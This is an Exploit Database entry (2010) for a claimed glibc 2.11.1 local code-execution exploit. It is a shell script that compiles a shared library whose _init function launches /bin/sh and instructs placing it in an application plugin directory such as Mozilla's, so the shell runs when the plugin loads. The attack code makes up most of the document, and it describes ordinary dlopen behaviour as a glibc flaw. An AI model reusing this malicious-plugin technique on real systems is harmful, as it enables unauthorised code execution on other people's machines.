Local Glibc Shared Library (.so) 2.11.1 – Code Execution

• Exploit Database
• 11 阅读

• 作者： Rh0
  日期： 2010-04-07
• 类别：

  • local
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/12103/

• # Exploit Title: Local Glibc shared library (.so) exploit
  # Date: 07.04.10
  # Author: Rh0 (Rh0@z1p.biz)
  # Software Link: NA
  # Version: <= 2.11.1, higher not tested
  # Tested on: Debian stable (x86-64), Ubunutu 9.10 (x86), Fedora 12 (x86)
  # CVE : NA
  # Code :
  
  #!/bin/sh
  
  # A lot of applications in linux use shared library structure to be
  # able to load plugins. E.g. Mozilla, Geany IDE, Compiz, Epiphany web
  # browser and more. Shared libraries are initialized (but not loaded)
  # often during startup, at a click at something like "->Tools->Plugins"
  # in the menue or at latest when they are activated. dlopen() is used
  # for initializing and is part of glibc.
  # See http://linux.die.net/man/3/dlopen.
  # It always executes the _init section of the shared library. A
  # malformed _init section makes dlopen crash (NULL dereference). But
  # this is not even necessary to exploit an application, as a custom
  # _init section is always executed when dlopen is called . The exploit
  # can be in the form of a custom compiled file. Also the _init section in
  # a plugin already shipped with the application can be overwritten with
  # working shellcode to exploit it or some \x41 to crash it .
  
  # PoC:
  
  cat >Xlibx.c<<EOF
  
  #include <unistd.h>
  _init()
  {
  execve("/bin/sh",NULL,NULL); // evil _init
  }
  EOF
  
  gcc -fPIC -c Xlibx.c
  ld -shared -soname Xlibx -o Xlibx.so -lc Xlibx.o
  rm Xlibx.c
  rm Xlibx.o
  
  echo "* copy Xlibx.so to appropriate directory:"
  echo "* Mozilla: HOMEDIR/.mozilla/plugins/ "
  echo "* firefox->Edit->Preferences => Exploit "